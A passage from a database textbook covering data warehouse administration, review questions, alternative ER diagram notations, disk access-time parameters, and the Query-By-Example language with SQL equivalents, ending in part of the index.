Usage projections should be estimated conservatively prior to construction of the data warehouse and should be revised continually to reflect current requirements. As utilization patterns become clear and change over time, storage and access paths can be tuned to remain optimized for support of the organization’s use of its warehouse. This activity should continue throughout the life of the warehouse in order to remain ahead of demand. The warehouse should also be designed to accommodate the addition and attrition of data sources without major redesign. Sources and source data will evolve, and the warehouse must accommodate such change. Fitting the available source data into the data model of the warehouse will be a continual challenge, a task that is as much art as science. Because there is continual rapid change in technologies, both the requirements and capabilities of the warehouse will change considerably over time. Additionally, data warehousing technology itself will continue to evolve for some time so that component structures and functionalities will continually be upgraded. This certain change is excellent motivation for having fully modular design of components.

Administration of a data warehouse will require far broader skills than are needed for traditional database administration.
A team of highly skilled technical experts with overlapping areas of expertise will likely be needed, rather than a single individual. Like database administration, data warehouse administration is only partly technical; a large part of the responsibility requires working effectively with all the members of the organization with an interest in the data warehouse. However difficult that can be at times for database administrators, it is that much more challenging for data warehouse administrators, as the scope of their responsibilities is considerably broader.

Design of the management function and selection of the management team for a database warehouse are crucial. Managing the data warehouse in a large organization will surely be a major task. Many commercial tools are available to support management functions. Effective data warehouse management will certainly be a team function, requiring a wide set of technical skills, careful coordination, and effective leadership. Just as we must prepare for the evolution of the warehouse, we must also recognize that the skills of the management team will, of necessity, evolve with it.

8 Summary

In this chapter we surveyed the field known as data warehousing. Data warehousing can be seen as a process that requires a variety of activities to precede it. In contrast, data mining may be thought of as an activity that draws knowledge from an existing data warehouse. We introduced key concepts related to data warehousing and we discussed the special functionality associated with a multidimensional view of data. We also discussed the ways in which data warehouses supply decision makers with information at the correct level of detail, based on an appropriate organization and perspective.

Review Questions

1. What is a data warehouse? How does it differ from a database?
2. Define the terms: OLAP (online analytical processing), ROLAP (relational OLAP), MOLAP (multidimensional OLAP), and DSS (decision-support systems).
3. Describe the characteristics of a data warehouse. Divide them into functionality of a warehouse and advantages users derive from it.
4. What is the multidimensional data model? How is it used in data warehousing?
5. Define the following terms: star schema, snowflake schema, fact constellation, data marts.
6. What types of indexes are built for a warehouse? Illustrate the uses for each with an example.
7. Describe the steps of building a warehouse.
8. What considerations play a major role in the design of a warehouse?
9. Describe the functions a user can perform on a data warehouse and illustrate the results of these functions on a sample multidimensional data warehouse.
10. How is the concept of a relational view related to a data warehouse and data marts? In what way are they different?
11. List the difficulties in implementing a data warehouse.
12. List the open issues and research problems in data warehousing.

Selected Bibliography

Inmon (1992, 2005) is credited for giving the term wide acceptance. Codd and Salley (1993) popularized the term online analytical processing (OLAP) and defined a set of characteristics for data warehouses to support OLAP. Kimball (1996) is known for his contribution to the development of the data warehousing field. Mattison (1996) is one of the several books on data warehousing that gives a comprehensive analysis of techniques available in data warehouses and the strategies companies should use in deploying them.
Ponniah (2002) gives a very good practical overview of the data warehouse building process from requirements collection to deployment maintenance. Bischoff and Alexander (1997) is a compilation of advice from experts. Chaudhuri and Dayal (1997) give an excellent tutorial on the topic, while Widom (1995) points to a number of outstanding research problems.

Alternative Diagrammatic Notations for ER Models

Figure 1 shows a number of different diagrammatic notations for representing ER (Entity-Relationship) and EER (Enhanced ER) model concepts. Unfortunately, there is no standard notation: different database design practitioners prefer different notations. Similarly, various CASE (computer-aided software engineering) tools and OOA (object-oriented analysis) methodologies use various notations. Some notations are associated with models that have additional concepts and constraints beyond those of the ER and EER models described in the chapters “Data Modeling Using the Entity-Relationship (ER) Model,” “The Enhanced Entity-Relationship (EER) Model,” and “Relational Database Design by ER and EER-to-Relational Mapping,” while other models have fewer concepts and constraints. The notation we used in the ER chapter is quite close to the original notation for ER diagrams, which is still widely used. We discuss some alternate notations here.

Figure 1(a) shows different notations for displaying entity types/classes, attributes, and relationships. In the above mentioned three chapters, we used the symbols marked (i) in Figure 1(a)—namely, rectangle, oval, and diamond. Notice that symbol (ii) for entity types/classes, symbol (ii) for attributes, and symbol (ii) for relationships are similar, but they are used by different methodologies to represent three different concepts. The straight line symbol (iii) for representing relationships is used by several tools and methodologies.

Figure 1(b) shows some notations for attaching attributes to entity types. We used notation (i). Notation (ii) uses the third notation (iii) for attributes from Figure 1(a). The last two notations in Figure 1(b)—(iii) and (iv)—are popular in OOA methodologies and in some CASE tools. In particular, the last notation displays both the attributes and the methods of a class, separated by a horizontal line.

[Figure 1 Alternative notations. (a) Symbols for entity type/class, attribute, and relationship. (b) Displaying attributes. (c) Displaying cardinality ratios. (d) Various (min, max) notations. (e) Notations for displaying specialization/generalization.]

Figure 1(c) shows various notations for representing the cardinality ratio of binary relationships. We used notation (i) in the three chapters.
Notation (ii)—known as the chicken feet notation—is quite popular. Notation (iv) uses the arrow as a functional reference (from the N to the 1 side) and resembles our notation for foreign keys in the relational model; notation (v)—used in Bachman diagrams and the network data model—uses the arrow in the reverse direction (from the 1 to the N side). For a 1:1 relationship, (ii) uses a straight line without any chicken feet; (iii) makes both halves of the diamond white; and (iv) places arrowheads on both sides. For an M:N relationship, (ii) uses chicken feet at both ends of the line; (iii) makes both halves of the diamond black; and (iv) does not display any arrowheads.

Figure 1(d) shows several variations for displaying (min, max) constraints, which are used to display both cardinality ratio and total/partial participation. We mostly used notation (i). Notation (ii) is the alternative notation we used in Figure 15 and discussed in Section 7.4 of the ER chapter. Recall that our notation specifies the constraint that each entity must participate in at least min and at most max relationship instances. Hence, for a 1:1 relationship, both max values are 1; for M:N, both max values are n. A min value greater than 0 (zero) specifies total participation (existence dependency). In methodologies that use the straight line for displaying relationships, it is common to reverse the positioning of the (min, max) constraints, as shown in (iii); a variation common in some tools (and in UML notation) is shown in (v). Another popular technique—which follows the same positioning as (iii)—is to display the min as o (“oh” or circle, which stands for zero) or as | (vertical dash, which stands for 1), and to display the max as | (vertical dash, which stands for 1) or as chicken feet (which stands for n), as shown in (iv).

Figure 1(e) shows some notations for displaying specialization/generalization. We used notation (i) in the EER chapter, where a d in the circle specifies that the subclasses (S1, S2, and S3) are disjoint and an o in the circle specifies overlapping subclasses. Notation (ii) uses G (for generalization) to specify disjoint, and Gs to specify overlapping; some notations use the solid arrow, while others use the empty arrow (shown at the side). Notation (iii) uses a triangle pointing toward the superclass, and notation (v) uses a triangle pointing toward the subclasses; it is also possible to use both notations in the same methodology, with (iii) indicating generalization and (v) indicating specialization. Notation (iv) places the boxes representing subclasses within the box representing the superclass. Of the notations based on (vi), some use a single-lined arrow, and others use a double-lined arrow (shown at the side).

The notations shown in Figure 1 show only some of the diagrammatic symbols that have been used or suggested for displaying database conceptual schemes. Other notations, as well as various combinations of the preceding, have also been used. It would be useful to establish a standard that everyone would adhere to, in order to prevent misunderstandings and reduce confusion.

Parameters of Disks

The most important disk parameter is the time required to locate an arbitrary disk block, given its block address, and then to transfer the block between the disk and a main memory buffer. This is the random access time for accessing a disk block. There are three time components to consider as follows:

1. Seek time (s).
This is the time needed to mechanically position the read/write head on the correct track for movable-head disks. (For fixed-head disks, it is the time needed to electronically switch to the appropriate read/write head.) For movable-head disks, this time varies, depending on the distance between the current track under the read/write head and the track specified in the block address. Usually, the disk manufacturer provides an average seek time in milliseconds. The typical range of average seek time is 4 to 10 msec. This is the main culprit for the delay involved in transferring blocks between disk and memory.

2. Rotational delay (rd). Once the read/write head is at the correct track, the user must wait for the beginning of the required block to rotate into position under the read/write head. On average, this takes about the time for half a revolution of the disk, but it actually ranges from immediate access (if the start of the required block is in position under the read/write head right after the seek) to a full disk revolution (if the start of the required block just passed the read/write head after the seek). If the speed of disk rotation is p revolutions per minute (rpm), then the average rotational delay rd is given by

rd = (1/2) * (1/p) min = (60 * 1000)/(2 * p) msec = 30000/p msec

A typical value for p is 10,000 rpm, which gives a rotational delay of rd = 3 msec. For fixed-head disks, where the seek time is negligible, this component causes the greatest delay in transferring a disk block.

3. Block transfer time (btt). Once the read/write head is at the beginning of the required block, some time is needed to transfer the data in the block. This block transfer time depends on the block size, track size, and rotational speed. If the transfer rate for the disk is tr bytes/msec and the block size is B bytes, then

btt = B/tr msec

If we have a track size of 50 Kbytes and p is 3600 rpm, then the transfer rate in bytes/msec is

tr = (50 * 1000)/(60 * 1000/3600) = 3000 bytes/msec

In this case, btt = B/3000 msec, where B is the block size in bytes.

The average time needed to find and transfer a block, given its block address, is estimated by

(s + rd + btt) msec

This holds for either reading or writing a block. The principal method of reducing this time is to transfer several blocks that are stored on one or more tracks of the same cylinder; then the seek time is required for the first block only. To transfer consecutively k noncontiguous blocks that are on the same cylinder, we need approximately

s + (k * (rd + btt)) msec

In this case, we need two or more buffers in main storage because we are continuously reading or writing the k blocks. The transfer time per block is reduced even further when consecutive blocks on the same track or cylinder are transferred. This eliminates the rotational delay for all but the first block, so the estimate for transferring k consecutive blocks is

s + rd + (k * btt) msec
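As a worked illustration of the difference between these two estimates (the specific numbers are assumed for this example, not taken from the text), suppose s = 5 msec, rd = 3 msec (p = 10,000 rpm), btt = 1 msec, and k = 20 blocks on the same cylinder. Transferring the blocks noncontiguously costs approximately

s + (k * (rd + btt)) = 5 + 20 * (3 + 1) = 85 msec

whereas transferring them as consecutive blocks costs approximately

s + rd + (k * btt) = 5 + 3 + (20 * 1) = 28 msec

since the rotational delay is paid only once.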
A more accurate estimate for transferring consecutive blocks takes into account the interblock gap, which includes the information that enables the read/write head to determine which block it is about to read. Usually, the disk manufacturer provides a bulk transfer rate (btr) that takes the gap size into account when reading consecutively stored blocks. If the gap size is G bytes, then

btr = (B/(B + G)) * tr bytes/msec

The bulk transfer rate is the rate of transferring useful bytes in the data blocks. The disk read/write head must go over all bytes on a track as the disk rotates, including the bytes in the interblock gaps, which store control information but not real data. When the bulk transfer rate is used, the time needed to transfer the useful data in one block out of several consecutive blocks is B/btr. Hence, the estimated time to read k blocks consecutively stored on the same cylinder becomes

s + rd + (k * (B/btr)) msec

Another parameter of disks is the rewrite time. This is useful in cases when we read a block from the disk into a main memory buffer, update the buffer, and then write the buffer back to the same disk block on which it was stored. In many cases, the time required to update the buffer in main memory is less than the time required for one disk revolution. If we know that the buffer is ready for rewriting, the system can keep the disk heads on the same track, and during the next disk revolution the updated buffer is rewritten back to the disk block. Hence, the rewrite time Trw is usually estimated to be the time needed for one disk revolution:

Trw = 2 * rd msec = 60000/p msec

To summarize, the following is a list of the parameters we have discussed and the symbols we use for them:

Seek time: s msec
Rotational delay: rd msec
Block transfer time: btt msec
Rewrite time: Trw msec
Transfer rate: tr bytes/msec
Bulk transfer rate: btr bytes/msec
Block size: B bytes
Interblock gap size: G bytes
Disk speed: p rpm (revolutions per minute)

Overview of the QBE Language

The Query-By-Example (QBE) language is important because it is one of the first graphical query languages with minimum syntax developed for database systems. It was developed at IBM Research and is available as an IBM commercial product as part of the QMF (Query Management Facility) interface option to DB2. The language was also implemented in the Paradox DBMS, and is related to a point-and-click type interface in the Microsoft Access DBMS. It differs from SQL in that the user does not have to explicitly specify a query using a fixed syntax; rather, the query is formulated by filling in templates of relations that are displayed on a monitor screen. Figure 1 shows how these templates may look for the database. The user does not have to remember the names of attributes or relations because they are displayed as part of these templates. Additionally, the user does not have to follow rigid syntax rules for query specification; rather, constants and variables are entered in the columns of the templates to construct an example related to the retrieval or update request. QBE is related to the domain relational calculus, as we shall see, and its original specification has been shown to be relationally complete.

1 Basic Retrievals in QBE

In QBE retrieval queries are specified by filling in one or more rows in the templates of the tables. For a single relation query, we enter either constants or example elements (a QBE term) in the columns of the template of that relation. An example element stands for a domain variable and is specified as an example value preceded by the underscore character (_).
Additionally, a P. prefix (called the P dot operator) is entered in certain columns to indicate that we would like to print (or display) values in those columns for our result. The constants specify values that must be exactly matched in those columns.

[Figure 1 The relational schema of Figure 5 in the chapter “The Relational Data Model and Relational Database Constraints” as it may be displayed by QBE, as templates:
EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)
DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)
DEPT_LOCATIONS (Dnumber, Dlocation)
PROJECT (Pname, Pnumber, Plocation, Dnum)
WORKS_ON (Essn, Pno, Hours)
DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)]

For example, consider the query Q0: Retrieve the birth date and address of John B. Smith. In Figures 2(a) through 2(d) we show how this query can be specified in a progressively more terse form in QBE. In Figure 2(a) an example of an employee is presented as the type of row that we are interested in. By leaving John B. Smith as constants in the Fname, Minit, and Lname columns, we are specifying an exact match in those columns. The rest of the columns are preceded by an underscore indicating that they are domain variables (example elements). The P. prefix is placed in the Bdate and Address columns to indicate that we would like to output value(s) in those columns.

Q0 can be abbreviated as shown in Figure 2(b). There is no need to specify example values for columns in which we are not interested. Moreover, because example values are completely arbitrary, we can just specify variable names for them, as shown in Figure 2(c). Finally, we can also leave out the example values entirely, as shown in Figure 2(d), and just specify a P. under the columns to be retrieved.

To see how retrieval queries in QBE are similar to the domain relational calculus, compare Figure 2(d) with Q0 (simplified) in domain calculus as follows:

Q0 : { uv | EMPLOYEE(qrstuvwxyz) and q=‘John’ and r=‘B’ and s=‘Smith’}

We can think of each column in a QBE template as an implicit domain variable; hence, Fname corresponds to the domain variable q, Minit corresponds to r, ..., and Dno corresponds to z. In the QBE query, the columns with P. correspond to variables specified to the left of the bar in domain calculus, whereas the columns with constant values correspond to tuple variables with equality selection conditions on them. The condition EMPLOYEE(qrstuvwxyz) and the existential quantifiers are implicit in the QBE query because the template corresponding to the EMPLOYEE relation is used.

In QBE, the user interface first allows the user to choose the tables (relations) needed to formulate a query by displaying a list of all relation names. Then the templates for the chosen relations are displayed. The user moves to the appropriate columns in the templates and specifies the query. Special function keys are provided to move among templates and perform certain functions. We now give examples to illustrate basic facilities of QBE.

Comparison operators other than = (such as > or ≥) may be entered in a column before typing a constant
value. For example, the query Q0A: List the social security numbers of employees who
work more than 20 hours per week on project number 1 can be specified as shown in
Figure 3(a). For more complex conditions, the user can ask for a condition box,
which is created by pressing a particular function key. The user can then type the
complex condition.1

Appendix: Overview of the QBE Language

EMPLOYEE(a)

(b)

(c)

(d)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith _123456789 P._9/1/60 P._100 Main, Houston, TX _M _25000 _123456789 _3

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P._9/1/60 P._100 Main, Houston, TX

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P._X P._Y

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P. P.

Figure 2
Four ways to specify the query Q0 in QBE.

1Negation with the ¬ symbol is not allowed in a condition box.


For example, the query Q0B: List the social security numbers of employees who work
more than 20 hours per week on either project 1 or project 2 can be specified as shown
in Figure 3(b).
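For comparison with SQL, which the text contrasts with QBE, the two queries can be written against the WORKS_ON relation of the schema in Figure 1 roughly as follows; these are illustrative equivalents only, not part of the QBE notation.

    -- Q0A: Ssn values of employees who work more than 20 hours per week on project 1.
    SELECT Essn
    FROM   WORKS_ON
    WHERE  Pno = 1 AND Hours > 20;

    -- Q0B: the same, but for either project 1 or project 2.
    SELECT Essn
    FROM   WORKS_ON
    WHERE  Hours > 20 AND (Pno = 1 OR Pno = 2);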

Some complex conditions can be specified without a condition box. The rule is that
all conditions specified on the same row of a relation template are connected by the
and logical connective (all must be satisfied by a selected tuple), whereas conditions
specified on distinct rows are connected by or (at least one must be satisfied).
Hence, Q0B can also be specified, as shown in Figure 3(c), by entering two distinct
rows in the template.

Now consider query Q0C: List the social security numbers of employees who work on
both project 1 and project 2; this cannot be specified as in Figure 4(a), which lists
those who work on either project 1 or project 2. The example variable _ES will bind
itself to Essn values in <–, 1, –> tuples as well as to those in <–, 2, –> tuples. Figure
4(b) shows how to specify Q0C correctly, where the condition (_EX = _EY) in the
box makes the _EX and _EY variables bind only to identical Essn values.
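An SQL rendering makes the distinction explicit: the incorrect specification of Figure 4(a) corresponds to an OR condition (like Q0B above), whereas the correct Q0C corresponds to a self-join of WORKS_ON. The sketch below is an illustrative equivalent over the same schema.

    -- Q0C: employees who work on both project 1 and project 2.
    SELECT W1.Essn
    FROM   WORKS_ON W1, WORKS_ON W2
    WHERE  W1.Essn = W2.Essn
      AND  W1.Pno = 1
      AND  W2.Pno = 2;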

In general, once a query is specified, the resulting values are displayed in the template
under the appropriate columns. If the result contains more rows than can be dis-
played on the screen, most QBE implementations have function keys to allow scroll-
ing up and down the rows. Similarly, if a template or several templates are too wide to
appear on the screen, it is possible to scroll sideways to examine all the templates.

A join operation is specified in QBE by using the same variable2 in the columns to
be joined. For example, the query Q1: List the name and address of all employees who

2A variable is called an example element in QBE manuals.

WORKS_ON

(a) Essn Pno Hours

P. 1 > 20

WORKS_ON

(b) Essn Pno Hours

P. _PX _HX

_HX > 20 and (_PX = 1 or _PX = 2)

CONDITIONS

WORKS_ON

(c) Essn Pno Hours

P. 1 > 20
P. 2 > 20

Figure 3
Specifying complex conditions
in QBE. (a) The query Q0A.
(b) The query Q0B with a
condition box. (c) The query
Q0B without a condition box.


work for the ‘Research’ department can be specified as shown in Figure 5(a). Any
number of joins can be specified in a single query. We can also specify a result table
to display the result of the join query, as shown in Figure 5(a); this is needed if the
result includes attributes from two or more relations. If no result table is specified,
the system provides the query result in the columns of the various relations, which
may make it difficult to interpret. Figure 5(a) also illustrates the feature of QBE for
specifying that all attributes of a relation should be retrieved, by placing the P. oper-
ator under the relation name in the relation template.

To join a table with itself, we specify different variables to represent the different ref-
erences to the table. For example, query Q8: For each employee retrieve the employee’s
first and last name as well as the first and last name of his or her immediate supervisor
can be specified as shown in Figure 5(b), where the variables starting with E refer to
an employee and those starting with S refer to a supervisor.
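Both join queries have straightforward SQL counterparts over the schema of Figure 1; the sketches below are given only for comparison with the QBE templates.

    -- Q1: name and address of all employees who work for the 'Research' department.
    SELECT Fname, Lname, Address
    FROM   EMPLOYEE, DEPARTMENT
    WHERE  Dname = 'Research' AND Dnumber = Dno;

    -- Q8: each employee's first and last name together with the supervisor's,
    -- expressed as a self-join with two tuple variables (like _E... and _S... in QBE).
    SELECT E.Fname, E.Lname, S.Fname, S.Lname
    FROM   EMPLOYEE E, EMPLOYEE S
    WHERE  E.Super_ssn = S.Ssn;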

2 Grouping, Aggregation, and Database
Modification in QBE

Next, consider the types of queries that require grouping or aggregate functions. A
grouping operator G. can be specified in a column to indicate that tuples should be
grouped by the value of that column. Common functions can be specified, such as
AVG., SUM., CNT. (count), MAX., and MIN. In QBE the functions AVG., SUM., and
CNT. are applied to distinct values within a group in the default case. If we want
these functions to apply to all values, we must use the prefix ALL.3 This convention
is different in SQL, where the default is to apply a function to all values.

WORKS_ON
(a) Essn Pno Hours

P._ES 1
P._ES 2

WORKS_ON
(b) Essn Pno Hours

P._EX 1
P._EY 2

_EX = _EY

CONDITIONS

Figure 4
Specifying EMPLOYEES who work
on both projects. (a) Incorrect
specification of an AND condition.
(b) Correct specification.

3ALL in QBE is unrelated to the universal quantifier.


Figure 6(a) shows query Q23, which counts the number of distinct salary values in
the EMPLOYEE relation. Query Q23A (Figure 6(b)) counts all salary values, which is
the same as counting the number of employees. Figure 6(c) shows Q24, which
retrieves each department number and the number of employees and average salary
within each department; hence, the Dno column is used for grouping as indicated by
the G. function. Several of the operators G., P., and ALL can be specified in a single
column. Figure 6(d) shows query Q26, which displays each project name and the
number of employees working on it for projects on which more than two employees
work.
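For readers who know SQL, the grouping queries of Figure 6 correspond roughly to the statements below; note that, as discussed above, SQL aggregates apply to all values by default, whereas QBE's default is distinct values.

    -- Q23A: count all salary values (i.e., the number of employees);
    -- Q23 would use COUNT(DISTINCT Salary) instead.
    SELECT COUNT(Salary) FROM EMPLOYEE;

    -- Q24: each department number with its number of employees and average salary.
    SELECT Dno, COUNT(*), AVG(Salary)
    FROM   EMPLOYEE
    GROUP BY Dno;

    -- Q26: each project name and the number of employees working on it,
    -- for projects on which more than two employees work.
    SELECT Pname, COUNT(*)
    FROM   PROJECT, WORKS_ON
    WHERE  Pnumber = Pno
    GROUP BY Pnumber, Pname
    HAVING COUNT(*) > 2;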

QBE has a negation symbol, ¬, which is used in a manner similar to the NOT EXISTS
function in SQL. Figure 7 shows query Q6, which lists the names of employees who
have no dependents. The negation symbol ¬ says that we will select values of the
_SX variable from the EMPLOYEE relation only if they do not occur in the
DEPENDENT relation. The same effect can be produced by placing a ¬ _SX in the
Essn column.
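The effect of the ¬ symbol here is the same as a NOT EXISTS subquery in SQL; an illustrative equivalent of Q6 over the same schema is:

    -- Q6: names of employees who have no dependents.
    SELECT Fname, Lname
    FROM   EMPLOYEE
    WHERE  NOT EXISTS (SELECT *
                       FROM   DEPENDENT
                       WHERE  Essn = Ssn);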

Although the QBE language as originally proposed was shown to support
the equivalent of the EXISTS and NOT EXISTS functions of SQL, the QBE imple-
mentation in QMF (under the DB2 system) does not provide this support. Hence,
the QMF version of QBE, which we discuss here, is not relationally complete.
Queries such as Q3: Find employees who work on all projects controlled by depart-
ment 5 cannot be specified.

EMPLOYEE(a)

(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno
_FN

Research

P. _FN _LN _Addr

_DX

_LN _Addr _DX

DEPARTMENT

Dname Dnumber Mgr_ssn Mgr_start_date

RESULT

P. _E1 _E2 _S1

RESULT
_S2

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno
_E1 _E2 _Xssn

_S1 _S2 _Xssn

Figure 5
Illustrating JOIN and result relations in QBE. (a) The query Q1. (b) The query Q8.


There are three QBE operators for modifying the database: I. for insert, D. for delete,
and U. for update. The insert and delete operators are specified in the template col-
umn under the relation name, whereas the update operator is specified under the
columns to be updated. Figure 8(a) shows how to insert a new EMPLOYEE tuple. For
deletion, we first enter the D. operator and then specify the tuples to be deleted by a
condition (Figure 8(b)). To update a tuple, we specify the U. operator under the
attribute name, followed by the new value of the attribute. We should also select the
tuple or tuples to be updated in the usual way. Figure 8(c) shows an update request

EMPLOYEE(a)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.CNT.

EMPLOYEE(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.CNT.ALL

EMPLOYEE(c)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P.AVG.ALL P.G.P.CNT.ALL

PROJECT(d)

Pname Pnumber Plocation

_PXP.

Dnum

WORKS_ON

Essn Pno Hours

P.CNT._EX G._PX

CNT._EX > 2

CONDITIONS

Figure 6
Functions and grouping in QBE. (a)
The query Q23. (b) The query Q23A.
(c) The query Q24. (d) The query Q26.

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

P. P. _SX

DEPENDENT

Essn Dependent_name Sex Bdate Relationship
_SX

Figure 7
Illustrating negation by the query Q6.


to increase the salary of ‘John Smith’ by 10 percent and also to reassign him to
department number 4.
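The three modification operators of Figure 8 correspond to the familiar SQL INSERT, DELETE, and UPDATE statements; the sketches below are equivalents given for comparison (the date format shown for Bdate is one possible rendering of the value in the figure).

    -- Figure 8(a): insert a new EMPLOYEE tuple.
    INSERT INTO EMPLOYEE
    VALUES ('Richard', 'K', 'Marini', '653298653', '1952-12-30',
            '98 Oak Forest, Katy, TX', 'M', 37000, '987654321', 4);

    -- Figure 8(b): delete the tuple(s) selected by the condition.
    DELETE FROM EMPLOYEE
    WHERE  Ssn = '653298653';

    -- Figure 8(c): raise John Smith's salary by 10 percent and move him to department 4.
    UPDATE EMPLOYEE
    SET    Salary = Salary * 1.1, Dno = 4
    WHERE  Fname = 'John' AND Lname = 'Smith';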

QBE also has data definition capabilities. The tables of a database can be specified
interactively, and a table definition can also be updated by adding, renaming, or
removing a column. We can also specify various characteristics for each column,
such as whether it is a key of the relation, what its data type is, and whether an index
should be created on that field. QBE also has facilities for view definition, authoriza-
tion, storing query definitions for later use, and so on.

QBE does not use the linear style of SQL; rather, it is a two-dimensional language
because users specify a query moving around the full area of the screen. Tests on
users have shown that QBE is easier to learn than SQL, especially for nonspecialists.
In this sense, QBE was the first user-friendly visual relational database language.

More recently, numerous other user-friendly interfaces have been developed for
commercial database systems. The use of menus, graphics, and forms is now
becoming quite common. Filling forms partially to issue a search request is akin to
using QBE. Visual query languages, which are still not so common, are likely to be
offered with commercial relational databases in the future.

EMPLOYEE(a)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

I. Richard K Marini 653298653 30-Dec-52 98 Oak Forest, Katy, TX M 37000 987654321 4

EMPLOYEE(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

D. 653298653

EMPLOYEE(c)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John Smith U._S*1.1 U.4

Figure 8
Modifying the database in QBE. (a) Insertion. (b) Deletion. (c) Update in QBE.


Index
Page references followed by “f” indicate illustrated
figures or photographs; followed by “t” indicates a
table.

/, 53, 56, 101, 280, 375-376, 423, 425, 431-434,
437-438, 440, 443-445, 462-463, 465,
468-470, 472, 475-478, 483, 491-493,
501-502, 504, 635, 693, 720, 858, 863,
914-915, 970-971, 1015, 1020, 1054-1055

//, 437-438, 492, 501-502

}, 5, 140, 151, 161, 164, 178-179, 181-188, 209,
238-239, 265, 296, 383-385, 391, 393,
396-398, 462-463, 467-470, 472, 475,
477-478, 482, 492-493, 496, 501, 504,
528-529, 545, 547-548, 552, 557-558,
561-563, 565-569, 577, 585, 600, 689,
696-697, 767, 952, 1059

<>, 93, 117-118

!=, 93, 495

<=, 92-93, 101, 118, 495, 691, 718-719, 960, 970-971
!, 93, 495
&, 342, 425
<, 61, 63, 72-73, 77, 88-90, 92-93, 101, 109, 117-118, 140, 151, 153, 161, 179, 186, 270, 296-297, 337-338, 341, 346, 423-426, 429-433, 439-440, 444-445, 461, 491-496, 578-580, 608-609, 620-621, 640, 651, 653-655, 657-658, 660-662, 666-668, 696-697, 701, 718-719, 744, 826, 905, 923, 970-971, 978, 985
||, 87, 101, 858, 1002
==, 462-463, 495
>, 52, 61, 63, 77, 89-90, 93, 101, 109, 117-118,
128-129, 133, 151, 161, 179, 186, 227, 234,
266, 270, 275, 296, 337-338, 346, 378, 380,
400-402, 408, 410-411, 425-426, 429-434,
443-445, 491-492, 494-496, 602, 604,
642-646, 660-662, 667-668, 672, 690-691,
696-697, 700-701, 718-720, 727, 730, 777,
793-795, 812, 848, 933, 970-971, 977, 985

::, 140, 935

+, 8, 17, 36, 40, 83, 88, 93, 101, 158, 352, 358-359,
365, 371, 381-382, 394, 402, 411-416, 435,
454, 457, 459, 468-471, 477-478, 567, 608,
640, 659, 661-662, 672, 689-690, 696-702,
718-723, 773, 777, 786-787, 953, 970, 989,
1005-1006, 1020

/=, 971

>=, 93, 101, 118, 495, 691, 718-719, 970-971, 977

1
1984, 143, 355, 623, 668, 679, 746, 875, 924-926,

988-989

3
3D objects, 25, 988
3NF, 350, 524-526, 530-537, 541, 543-549, 551-552,

559-560, 565-569, 573-574, 582, 584-586,
738, 741, 746

4
4NF, 524-525, 530, 539-541, 574-577, 582, 737

A
Abort, 755-757, 760-762, 765, 776, 789-791, 822, 825,

834, 907-909
abstract, 11, 22, 60-61, 106, 244, 266, 269-271, 274,

277, 365, 374, 411, 414, 929, 958
BASIC, 61, 106, 266, 269, 400, 411, 414, 929
exception, 269
float, 411
generalization, 266, 269-270, 274
generic, 365
inheritance, 22, 266, 274, 374, 400, 414
instance, 269, 271, 365
long, 60, 411
members, 266, 277
name, 11, 60-61, 244, 270-271, 365, 374
pointers, 22
primitive, 271
short, 411
specialization, 266, 269-270, 274
subclass, 266, 269-270, 274
superclass, 266, 269-270, 274

abstract classes, 266
Abstraction, 8-11, 21, 28, 251, 268-271, 275
acceptability, 313, 331, 841-842
Access:, 862
access, 1-5, 8-11, 13-14, 16-17, 21-22, 25, 27, 29, 32,

34, 37-38, 40-42, 44-46, 48, 55-56, 105-106,
204, 229, 276, 311-312, 329-334, 348, 365,
367, 399, 410, 460, 471, 476-477, 493-494,
499-500, 502, 504, 589-590, 592, 597, 601,
603-608, 614, 616-617, 622-623, 625,
628-630, 633-634, 636-638, 640-641, 647,
649-650, 654-655, 657-658, 665-668,
673-676, 678-679, 682, 690-695, 706,
716-717, 719, 724-728, 733-736, 748-752,
766-767, 774, 781-783, 787-788, 796,
804-805, 828, 836-845, 851-860, 862-863,
868-873, 875-876, 882-884, 908-909, 911,
913-914, 918-919, 926, 930, 961, 997-998,
1017-1018, 1027-1028, 1044-1047

methods, 48, 329, 334, 348, 454, 476, 606, 673,
690-694, 714, 717, 719, 724, 758, 863,
872, 908, 911, 997, 1046

Access control, 836, 838, 840-843, 848, 851-856, 862,
868-873, 875-876

database, 836, 838, 840-843, 848, 851-856, 862,
868-873, 875-876

policies of, 841
Access time, 332, 610-611, 623, 629-630, 691, 1054
access times, 611, 623, 682
accessibility, 1037
accuracy, 235, 336
ACM, 26, 81, 285, 779, 891
Action, 76, 91, 105, 107, 132-133, 244, 291, 293,

338-340, 492-494, 498, 745, 757, 812,
825-826, 837, 854, 869, 875, 931-932,
934-940, 981

action attribute, 493
Active records, 634
Actors, 12, 25, 243-244, 336-337, 342
add method, 728

algorithm, 728
efficiency of, 728

adding, 15, 31, 33, 122, 137-139, 322, 324, 328,
366-368, 400, 403, 553, 627, 726, 773, 777,
844, 857, 882, 909, 939-940, 945, 951

security, 122, 844, 857, 951
Addition, 3, 14-16, 22-23, 25, 28, 38, 48, 52, 55, 69,

85, 88, 92, 101, 105-106, 152, 177, 180,
229, 269, 273-274, 277, 316-317, 365, 374,
387, 391, 399, 411, 413, 425, 447, 466,
483-484, 559, 627, 715-716, 721, 727, 762,
773, 828, 848-849, 869, 882-883, 936,

953-955, 1047
address, 2, 58-62, 67-68, 71, 80, 86, 93-97, 100, 108,

110-111, 123-124, 139, 143-145, 151, 154,
